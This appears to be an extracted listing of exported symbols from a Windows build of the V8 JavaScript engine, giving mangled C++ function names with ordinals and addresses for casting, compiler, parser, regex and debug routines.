                                                                                                                                                                                                        ?Cast@SharedArrayBuffer@v8@@SAPEAV12@PEAVValue@2@@Z39230x140078ac0
                                                                                                                                                                                                        ?Cast@Signature@v8@@SAPEAV12@PEAVData@2@@Z39240x140078ac0
                                                                                                                                                                                                        ?Cast@String@v8@@SAPEAV12@PEAVData@2@@Z39250x140078ac0
                                                                                                                                                                                                        ?Cast@StringObject@v8@@SAPEAV12@PEAVValue@2@@Z39260x140078ac0
                                                                                                                                                                                                        ?Cast@Symbol@v8@@SAPEAV12@PEAVData@2@@Z39270x140078ac0
                                                                                                                                                                                                        ?Cast@SymbolObject@v8@@SAPEAV12@PEAVValue@2@@Z39280x140078ac0
                                                                                                                                                                                                        ?Cast@TypedArray@v8@@SAPEAV12@PEAVValue@2@@Z39290x140078ac0
                                                                                                                                                                                                        ?Cast@Uint16Array@v8@@SAPEAV12@PEAVValue@2@@Z39300x140078ac0
                                                                                                                                                                                                        ?Cast@Uint32@v8@@SAPEAV12@PEAVData@2@@Z39310x140078ac0
                                                                                                                                                                                                        ?Cast@Uint32Array@v8@@SAPEAV12@PEAVValue@2@@Z39320x140078ac0
                                                                                                                                                                                                        ?Cast@Uint8Array@v8@@SAPEAV12@PEAVValue@2@@Z39330x140078ac0
                                                                                                                                                                                                        ?Cast@Uint8ClampedArray@v8@@SAPEAV12@PEAVValue@2@@Z39340x140078ac0
                                                                                                                                                                                                        ?Cast@WasmMemoryObject@v8@@SAPEAV12@PEAVValue@2@@Z39350x140078ac0
                                                                                                                                                                                                        ?Cast@WasmModuleObject@v8@@SAPEAV12@PEAVValue@2@@Z39360x140078ac0
                                                                                                                                                                                                        ?Cast@WasmValueObject@debug@v8@@SAPEAV123@PEAVValue@3@@Z39370x140078ac0
                                                                                                                                                                                                        ?Catch@Promise@v8@@QEAA?AV?$MaybeLocal@VPromise@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VFunction@v8@@@2@@Z39380x140b09800
                                                                                                                                                                                                        ?CellAlignIndex@Bitmap@internal@v8@@SAII@Z39390x140482a90
                                                                                                                                                                                                        ?CellAt@GlobalDictionary@internal@v8@@QEAA?AVPropertyCell@23@VInternalIndex@23@@Z39400x140482aa0
                                                                                                                                                                                                        ?CellAt@GlobalDictionary@internal@v8@@QEAA?AVPropertyCell@23@VPtrComprCageBase@23@VInternalIndex@23@@Z39410x140482ac0
                                                                                                                                                                                                        ?CellsCount@Bitmap@internal@v8@@SA_KXZ39420x140482ae0
                                                                                                                                                                                                        ?CellsForLength@Bitmap@internal@v8@@SA_KH@Z39430x140482af0
                                                                                                                                                                                                        ?Change@CommonOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@00@Z39440x140f9e9f0
                                                                                                                                                                                                        ?Change@CommonOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0@Z39450x140f9eb10
                                                                                                                                                                                                        ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@AEBVCallable@34@HW4FrameStateFlag@1234@@Z39460x141014c10
                                                                                                                                                                                                        ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0000@Z39470x141014ce0
                                                                                                                                                                                                        ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@000@Z39480x141014ee0
                                                                                                                                                                                                        ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@00@Z39490x141015080
                                                                                                                                                                                                        ?Change@JSIntrinsicLowering@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@@Z39500x1410151c0
                                                                                                                                                                                                        ?Change@SimplifiedOperatorReducer@compiler@internal@v8@@AEAA?AVReduction@234@PEAVNode@234@PEBVOperator@234@0@Z39510x141074220
                                                                                                                                                                                                        ?ChangeBitToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39520x140f4b960
                                                                                                                                                                                                        ?ChangeBreakOnException@Debug@internal@v8@@QEAAXW4ExceptionBreakType@23@_N@Z39530x140a5dae0
                                                                                                                                                                                                        ?ChangeFloat32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UFloat32T@internal@v8@@@34@@Z39540x140f1f540
                                                                                                                                                                                                        ?ChangeFloat32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39550x140f594a0
                                                                                                                                                                                                        ?ChangeFloat32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39560x140eca500
                                                                                                                                                                                                        ?ChangeFloat32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39570x140f1f5a0
                                                                                                                                                                                                        ?ChangeFloat64ToInt32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39580x140f59500
                                                                                                                                                                                                        ?ChangeFloat64ToInt32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39590x140eca510
                                                                                                                                                                                                        ?ChangeFloat64ToInt32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39600x140f1f5e0
                                                                                                                                                                                                        ?ChangeFloat64ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39610x140f59560
                                                                                                                                                                                                        ?ChangeFloat64ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39620x140eca520
                                                                                                                                                                                                        ?ChangeFloat64ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39630x140f1f620
                                                                                                                                                                                                        ?ChangeFloat64ToIntPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z39640x140f1f660
                                                                                                                                                                                                        ?ChangeFloat64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckForMinusZeroMode@234@@Z39650x140f4b970
                                                                                                                                                                                                        ?ChangeFloat64ToTaggedPointer@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39660x140f4b9b0
                                                                                                                                                                                                        ?ChangeFloat64ToUint32@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint32T@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z39670x140f1f6d0
                                                                                                                                                                                                        ?ChangeFloat64ToUint32@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39680x140f595c0
                                                                                                                                                                                                        ?ChangeFloat64ToUint32@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39690x140eca530
                                                                                                                                                                                                        ?ChangeFloat64ToUint32@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39700x140f1f730
                                                                                                                                                                                                        ?ChangeFloat64ToUint64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint64T@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z39710x140f1f770
                                                                                                                                                                                                        ?ChangeFloat64ToUint64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39720x140eca540
                                                                                                                                                                                                        ?ChangeFloat64ToUint64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39730x140f1f7d0
                                                                                                                                                                                                        ?ChangeFloat64ToUintPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUintPtrT@internal@v8@@@34@V?$TNode@UFloat64T@internal@v8@@@34@@Z39740x140f1f810
                                                                                                                                                                                                        ?ChangeInt31ToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39750x140f4b9c0
                                                                                                                                                                                                        ?ChangeInt32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UInt32T@internal@v8@@@34@@Z39760x140f1f880
                                                                                                                                                                                                        ?ChangeInt32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39770x140f59620
                                                                                                                                                                                                        ?ChangeInt32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39780x140eca550
                                                                                                                                                                                                        ?ChangeInt32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39790x140f1f8e0
                                                                                                                                                                                                        ?ChangeInt32ToInt64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UInt64T@internal@v8@@@34@V?$TNode@UInt32T@internal@v8@@@34@@Z39800x140f1f920
                                                                                                                                                                                                        ?ChangeInt32ToInt64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39810x140f59680
                                                                                                                                                                                                        ?ChangeInt32ToInt64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39820x140eca560
                                                                                                                                                                                                        ?ChangeInt32ToInt64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39830x140f1f980
                                                                                                                                                                                                        ?ChangeInt32ToIntPtr@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UIntPtrT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z39840x140f1f9c0
                                                                                                                                                                                                        ?ChangeInt32ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39850x140f4b9d0
                                                                                                                                                                                                        ?ChangeInt64ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39860x140f596e0
                                                                                                                                                                                                        ?ChangeInt64ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39870x140eca570
                                                                                                                                                                                                        ?ChangeInt64ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z39880x140f1fa40
                                                                                                                                                                                                        ?ChangeInt64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39890x140f4b9e0
                                                                                                                                                                                                        ?ChangeOp@NodeProperties@compiler@internal@v8@@SAXPEAVNode@234@PEBVOperator@234@@Z39900x140078e40
                                                                                                                                                                                                        ?ChangeOp@SimplifiedLowering@compiler@internal@v8@@AEAAXPEAVNode@234@PEBVOperator@234@@Z39910x14106cb70
                                                                                                                                                                                                        ?ChangeTaggedSignedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39920x140f4b9f0
                                                                                                                                                                                                        ?ChangeTaggedSignedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39930x140f4ba00
                                                                                                                                                                                                        ?ChangeTaggedToBit@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39940x140f4ba10
                                                                                                                                                                                                        ?ChangeTaggedToFloat64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39950x140f4ba20
                                                                                                                                                                                                        ?ChangeTaggedToInt32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39960x140f4ba30
                                                                                                                                                                                                        ?ChangeTaggedToInt64@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39970x140f4ba40
                                                                                                                                                                                                        ?ChangeTaggedToTaggedSigned@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39980x140f4ba50
                                                                                                                                                                                                        ?ChangeTaggedToUint32@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ39990x140f4ba60
                                                                                                                                                                                                        ?ChangeUint32ToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z40000x140f1fa80
                                                                                                                                                                                                        ?ChangeUint32ToFloat64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40010x140f59740
                                                                                                                                                                                                        ?ChangeUint32ToFloat64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40020x140eca580
                                                                                                                                                                                                        ?ChangeUint32ToFloat64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40030x140f1fae0
                                                                                                                                                                                                        ?ChangeUint32ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40040x140f4ba70
                                                                                                                                                                                                        ?ChangeUint32ToUint64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUint64T@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z40050x140f1fb20
                                                                                                                                                                                                        ?ChangeUint32ToUint64@GraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40060x140f597a0
                                                                                                                                                                                                        ?ChangeUint32ToUint64@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40070x140eca590
                                                                                                                                                                                                        ?ChangeUint32ToUint64@RawMachineAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@@Z40080x140f1fb80
                                                                                                                                                                                                        ?ChangeUint32ToWord@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UUintPtrT@internal@v8@@@34@V?$TNode@UWord32T@internal@v8@@@34@@Z40090x140f1fbc0
                                                                                                                                                                                                        ?ChangeUint64ToBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40100x140f4ba80
                                                                                                                                                                                                        ?ChangeUint64ToTagged@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ40110x140f4ba90
                                                                                                                                                                                                        ?ChangeUintPtrToFloat64@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@UFloat64T@internal@v8@@@34@V?$TNode@UUintPtrT@internal@v8@@@34@@Z40120x140f1fc40
                                                                                                                                                                                                        ?ChangeUsed@NormalPageMemoryRegion@internal@cppgc@@AEAAX_K_N@Z40130x140450f70
                                                                                                                                                                                                        ?Changed@Reducer@compiler@internal@v8@@SA?AVReduction@234@PEAVNode@234@@Z40140x140078b40
                                                                                                                                                                                                        ?Check@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NW4Value@Token@23@@Z40150x140773a40
                                                                                                                                                                                                        ?Check@TurboAssembler@internal@v8@@QEAAXW4Condition@23@W4AbortReason@23@@Z40160x140501fc0
                                                                                                                                                                                                        ?CheckApiConstants@HeapObjectHeader@internal@cppgc@@AEAAXXZ40170x140078990
                                                                                                                                                                                                        ?CheckApiInterrupt@StackGuard@internal@v8@@QEAA_NXZ40180x140482b00
                                                                                                                                                                                                        ?CheckArityRestrictions@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXHW4FunctionKind@23@_NHH@Z40190x140773a70
                                                                                                                                                                                                        ?CheckArrayLength@JSCallReducer@compiler@internal@v8@@AEAAPEAVNode@234@PEAV5234@W4ElementsKind@34@IAEBUFeedbackSource@234@VEffect@234@VControl@234@@Z40200x140fda950
                                                                                                                                                                                                        ?CheckAssigningFunctionLiteralToProperty@Parser@internal@v8@@CAXPEAVExpression@23@0@Z40210x140773b50
                                                                                                                                                                                                        ?CheckAtStart@RegExpBytecodeGenerator@internal@v8@@UEAAXHPEAVLabel@23@@Z40220x14073c8f0
                                                                                                                                                                                                        ?CheckAtStart@RegExpMacroAssemblerX64@internal@v8@@UEAAXHPEAVLabel@23@@Z40230x1404aa910
                                                                                                                                                                                                        ?CheckBigInt@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z40240x1410a0ad0
                                                                                                                                                                                                        ?CheckBigInt@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z40250x140f4baa0
                                                                                                                                                                                                        ?CheckBitInTable@RegExpBytecodeGenerator@internal@v8@@UEAAXV?$Handle@VByteArray@internal@v8@@@23@PEAVLabel@23@@Z40260x14073c970
                                                                                                                                                                                                        ?CheckBitInTable@RegExpMacroAssemblerX64@internal@v8@@UEAAXV?$Handle@VByteArray@internal@v8@@@23@PEAVLabel@23@@Z40270x1404aaa20
                                                                                                                                                                                                        ?CheckBounds@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@0@Z40280x1410a0ae0
                                                                                                                                                                                                        ?CheckBounds@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@V?$Flags@W4CheckBoundsFlag@compiler@internal@v8@@H@base@4@@Z40290x140f4bb80
                                                                                                                                                                                                        ?CheckBreakPoint@Debug@internal@v8@@AEAA_NV?$Handle@VBreakPoint@internal@v8@@@23@_N@Z40300x140a5daf0
                                                                                                                                                                                                        ?CheckBreakPoints@Debug@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@PEAVBreakLocation@23@PEA_N@Z40310x140a5dc50
                                                                                                                                                                                                        ?CheckCachedDataInvariants@ExternalOneByteStringResource@String@v8@@AEBAXXZ40320x140078990
                                                                                                                                                                                                        ?CheckCachedDataInvariants@ExternalStringResource@String@v8@@AEBAXXZ40330x140078990
                                                                                                                                                                                                        ?CheckCallable@Parser@internal@v8@@AEAAPEAVStatement@23@PEAVVariable@23@PEAVExpression@23@H@Z40340x1407a45a0
                                                                                                                                                                                                        ?CheckCast@AccessorPair@debug@v8@@CAXPEAVValue@3@@Z40350x140a6df80
                                                                                                                                                                                                        ?CheckCast@AccessorSignature@v8@@CAXPEAVData@2@@Z40360x140b09b40
                                                                                                                                                                                                        ?CheckCast@Array@v8@@CAXPEAVValue@2@@Z40370x140b09bc0
                                                                                                                                                                                                        ?CheckCast@ArrayBuffer@v8@@CAXPEAVValue@2@@Z40380x140b09c50
                                                                                                                                                                                                        ?CheckCast@ArrayBufferView@v8@@CAXPEAVValue@2@@Z40390x140b09ce0
                                                                                                                                                                                                        ?CheckCast@BigInt64Array@v8@@CAXPEAVValue@2@@Z40400x140b09d70
                                                                                                                                                                                                        ?CheckCast@BigInt@v8@@CAXPEAVData@2@@Z40410x140b09e10
                                                                                                                                                                                                        ?CheckCast@BigIntObject@v8@@CAXPEAVValue@2@@Z40420x140b09e90
                                                                                                                                                                                                        ?CheckCast@BigUint64Array@v8@@CAXPEAVValue@2@@Z40430x140b09f30
                                                                                                                                                                                                        ?CheckCast@Boolean@v8@@CAXPEAVData@2@@Z40440x140b09fd0
                                                                                                                                                                                                        ?CheckCast@BooleanObject@v8@@CAXPEAVValue@2@@Z40450x140b0a060
                                                                                                                                                                                                        ?CheckCast@Context@v8@@CAXPEAVData@2@@Z40460x140b0a110
                                                                                                                                                                                                        ?CheckCast@DataView@v8@@CAXPEAVValue@2@@Z40470x140b0a1a0
                                                                                                                                                                                                        ?CheckCast@Date@v8@@CAXPEAVValue@2@@Z40480x140b0a230
                                                                                                                                                                                                        ?CheckCast@External@v8@@CAXPEAVValue@2@@Z40490x140b0a2c0
                                                                                                                                                                                                        ?CheckCast@Float32Array@v8@@CAXPEAVValue@2@@Z40500x140b0a370
                                                                                                                                                                                                        ?CheckCast@Float64Array@v8@@CAXPEAVValue@2@@Z40510x140b0a410
                                                                                                                                                                                                        ?CheckCast@Function@v8@@CAXPEAVValue@2@@Z40520x140b0a4b0
                                                                                                                                                                                                        ?CheckCast@FunctionTemplate@v8@@CAXPEAVData@2@@Z40530x140b0a530
                                                                                                                                                                                                        ?CheckCast@Int16Array@v8@@CAXPEAVValue@2@@Z40540x140b0a5b0
                                                                                                                                                                                                        ?CheckCast@Int32@v8@@CAXPEAVData@2@@Z40550x140b0a650
                                                                                                                                                                                                        ?CheckCast@Int32Array@v8@@CAXPEAVValue@2@@Z40560x140b0a6d0
                                                                                                                                                                                                        ?CheckCast@Int8Array@v8@@CAXPEAVValue@2@@Z40570x140b0a770
                                                                                                                                                                                                        ?CheckCast@Integer@v8@@CAXPEAVData@2@@Z40580x140b0a810
                                                                                                                                                                                                        ?CheckCast@Map@v8@@CAXPEAVValue@2@@Z40590x140b0a8a0
                                                                                                                                                                                                        ?CheckCast@Module@v8@@CAXPEAVData@2@@Z40600x140b0a930
                                                                                                                                                                                                        ?CheckCast@ModuleRequest@v8@@CAXPEAVData@2@@Z40610x140b0a9c0
                                                                                                                                                                                                        ?CheckCast@Name@v8@@CAXPEAVData@2@@Z40620x140b0aa40
                                                                                                                                                                                                        ?CheckCast@Number@v8@@CAXPEAVData@2@@Z40630x140b0aac0
                                                                                                                                                                                                        ?CheckCast@NumberObject@v8@@CAXPEAVValue@2@@Z40640x140b0ab50
                                                                                                                                                                                                        ?CheckCast@Object@v8@@CAXPEAVValue@2@@Z40650x140b0ac00
                                                                                                                                                                                                        ?CheckCast@ObjectTemplate@v8@@CAXPEAVData@2@@Z40660x140b0ac90
                                                                                                                                                                                                        ?CheckCast@Private@v8@@CAXPEAVData@2@@Z40670x140b0ad10
                                                                                                                                                                                                        ?CheckCast@Promise@v8@@CAXPEAVValue@2@@Z40680x140b0ada0
                                                                                                                                                                                                        ?CheckCast@Proxy@v8@@CAXPEAVValue@2@@Z40690x140b0ae30
                                                                                                                                                                                                        ?CheckCast@RegExp@v8@@CAXPEAVValue@2@@Z40700x140b0aec0
                                                                                                                                                                                                        ?CheckCast@Resolver@Promise@v8@@CAXPEAVValue@3@@Z40710x140b0af50
                                                                                                                                                                                                        ?CheckCast@Set@v8@@CAXPEAVValue@2@@Z40720x140b0afe0
                                                                                                                                                                                                        ?CheckCast@SharedArrayBuffer@v8@@CAXPEAVValue@2@@Z40730x140b0b070
                                                                                                                                                                                                        ?CheckCast@Signature@v8@@CAXPEAVData@2@@Z40740x140b0b100
                                                                                                                                                                                                        ?CheckCast@String@v8@@CAXPEAVData@2@@Z40750x140b0b180
                                                                                                                                                                                                        ?CheckCast@StringObject@v8@@CAXPEAVValue@2@@Z40760x140b0b200
                                                                                                                                                                                                        ?CheckCast@Symbol@v8@@CAXPEAVData@2@@Z40770x140b0b2a0
                                                                                                                                                                                                        ?CheckCast@SymbolObject@v8@@CAXPEAVValue@2@@Z40780x140b0b320
                                                                                                                                                                                                        ?CheckCast@TypedArray@v8@@CAXPEAVValue@2@@Z40790x140b0b3c0
                                                                                                                                                                                                        ?CheckCast@Uint16Array@v8@@CAXPEAVValue@2@@Z40800x140b0b450
                                                                                                                                                                                                        ?CheckCast@Uint32@v8@@CAXPEAVData@2@@Z40810x140b0b4f0
                                                                                                                                                                                                        ?CheckCast@Uint32Array@v8@@CAXPEAVValue@2@@Z40820x140b0b570
                                                                                                                                                                                                        ?CheckCast@Uint8Array@v8@@CAXPEAVValue@2@@Z40830x140b0b610
                                                                                                                                                                                                        ?CheckCast@Uint8ClampedArray@v8@@CAXPEAVValue@2@@Z40840x140b0b6b0
                                                                                                                                                                                                        ?CheckCast@Value@v8@@CAXPEAVData@2@@Z40850x140b0b750
                                                                                                                                                                                                        ?CheckCast@WasmMemoryObject@v8@@CAXPEAVValue@2@@Z40860x140b0b800
                                                                                                                                                                                                        ?CheckCast@WasmModuleObject@v8@@CAXPEAVValue@2@@Z40870x140b0b890
                                                                                                                                                                                                        ?CheckCast@WasmValueObject@debug@v8@@CAXPEAVValue@3@@Z40880x140a6dfb0
                                                                                                                                                                                                        ?CheckCharacter@RegExpBytecodeGenerator@internal@v8@@UEAAXIPEAVLabel@23@@Z40890x14073caf0
                                                                                                                                                                                                        ?CheckCharacter@RegExpMacroAssemblerX64@internal@v8@@UEAAXIPEAVLabel@23@@Z40900x1404aab30
                                                                                                                                                                                                        ?CheckCharacterAfterAnd@RegExpBytecodeGenerator@internal@v8@@UEAAXIIPEAVLabel@23@@Z40910x14073cb90
                                                                                                                                                                                                        ?CheckCharacterAfterAnd@RegExpMacroAssemblerX64@internal@v8@@UEAAXIIPEAVLabel@23@@Z40920x1404aaba0
                                                                                                                                                                                                        ?CheckCharacterGT@RegExpBytecodeGenerator@internal@v8@@UEAAXGPEAVLabel@23@@Z40930x14073cc40
                                                                                                                                                                                                        ?CheckCharacterGT@RegExpMacroAssemblerX64@internal@v8@@UEAAXGPEAVLabel@23@@Z40940x1404aac70
                                                                                                                                                                                                        ?CheckCharacterInRange@RegExpBytecodeGenerator@internal@v8@@UEAAXGGPEAVLabel@23@@Z40950x14073ccc0
                                                                                                                                                                                                        ?CheckCharacterInRange@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGPEAVLabel@23@@Z40960x1404aace0
                                                                                                                                                                                                        ?CheckCharacterLT@RegExpBytecodeGenerator@internal@v8@@UEAAXGPEAVLabel@23@@Z40970x14073cd60
                                                                                                                                                                                                        ?CheckCharacterLT@RegExpMacroAssemblerX64@internal@v8@@UEAAXGPEAVLabel@23@@Z40980x1404aadf0
                                                                                                                                                                                                        ?CheckCharacterNotInRange@RegExpBytecodeGenerator@internal@v8@@UEAAXGGPEAVLabel@23@@Z40990x14073cde0
                                                                                                                                                                                                        ?CheckCharacterNotInRange@RegExpMacroAssemblerX64@internal@v8@@UEAAXGGPEAVLabel@23@@Z41000x1404aae60
                                                                                                                                                                                                        ?CheckClassFieldName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@_N@Z41010x140773b70
                                                                                                                                                                                                        ?CheckClassMethodName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEBVAstRawString@23@W4ParsePropertyKind@23@V?$Flags@W4ParseFunctionFlag@internal@v8@@H@base@3@_NPEA_N@Z41020x140773bc0
                                                                                                                                                                                                        ?CheckClosure@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBV?$Handle@VFeedbackCell@internal@v8@@@34@@Z41030x140f4bd10
                                                                                                                                                                                                        ?CheckConflictingVarDeclarations@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXPEAVDeclarationScope@23@@Z41040x140773c50
                                                                                                                                                                                                        ?CheckConflictingVarDeclarations@DeclarationScope@internal@v8@@QEAAPEAVDeclaration@23@PEA_N@Z41050x140af3680
                                                                                                                                                                                                        ?CheckContextualKeyword@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAA_NPEBVAstRawString@23@@Z41060x140773cd0
                                                                                                                                                                                                        ?CheckDeoptMarkedAllocationSites@StackGuard@internal@v8@@QEAA_NXZ41070x140482b10
                                                                                                                                                                                                        ?CheckDetachedContextsAfterGC@Isolate@internal@v8@@QEAAXXZ41080x140a0db30
                                                                                                                                                                                                        ?CheckEqualsInternalizedString@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41090x140f4bdd0
                                                                                                                                                                                                        ?CheckEqualsSymbol@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41100x140f4bde0
                                                                                                                                                                                                        ?CheckExecutionState@Debug@internal@v8@@QEAA_NXZ41110x140479940
                                                                                                                                                                                                        ?CheckFlagsForFunctionFromScript@ParseInfo@internal@v8@@QEAAXVScript@23@@Z41120x140078990
                                                                                                                                                                                                        ?CheckFlagsForToplevelCompileFromScript@ParseInfo@internal@v8@@AEAAXVScript@23@_N@Z41130x1407b2600
                                                                                                                                                                                                        ?CheckFloat64Hole@OperationTyper@compiler@internal@v8@@QEAA?AVType@234@V5234@@Z41140x1410a0be0
                                                                                                                                                                                                        ?CheckFloat64Hole@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4CheckFloat64HoleMode@234@AEBUFeedbackSource@234@@Z41150x140f4bdf0
                                                                                                                                                                                                        ?CheckFloatingPointParameters@CallInterfaceDescriptor@internal@v8@@IEAA_NPEAVCallInterfaceDescriptorData@23@@Z41160x1404bb570
                                                                                                                                                                                                        ?CheckFunctionName@?$ParserBase@VParser@internal@v8@@@internal@v8@@IEAAXW4LanguageMode@23@PEBVAstRawString@23@W4FunctionNameValidity@23@AEBULocation@Scanner@23@@Z41170x140773d50
                                                                                                                                                                                                        ?CheckGC@StackGuard@internal@v8@@QEAA_NXZ41180x140482b20
                                                                                                                                                                                                        ?CheckGreedyLoop@RegExpBytecodeGenerator@internal@v8@@UEAAXPEAVLabel@23@@Z41190x14073ce80
                                                                                                                                                                                                        ?CheckGreedyLoop@RegExpMacroAssemblerX64@internal@v8@@UEAAXPEAVLabel@23@@Z41200x1404aaf70
                                                                                                                                                                                                        ?CheckGrowSharedMemory@StackGuard@internal@v8@@QEAA_NXZ41210x140482b30
                                                                                                                                                                                                        ?CheckHardwareSupportsSimd@wasm@internal@v8@@YA_NXZ41220x1405c2ec0
                                                                                                                                                                                                        ?CheckHeapObject@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ41230x140f4bf10
                                                                                                                                                                                                        ?CheckIf@JSGraphAssembler@compiler@internal@v8@@QEAAPEAVNode@234@PEAV5234@W4DeoptimizeReason@34@@Z41240x140f59800
                                                                                                                                                                                                        ?CheckIf@SimplifiedOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@W4DeoptimizeReason@34@AEBUFeedbackSource@234@@Z41250x140f4bf20
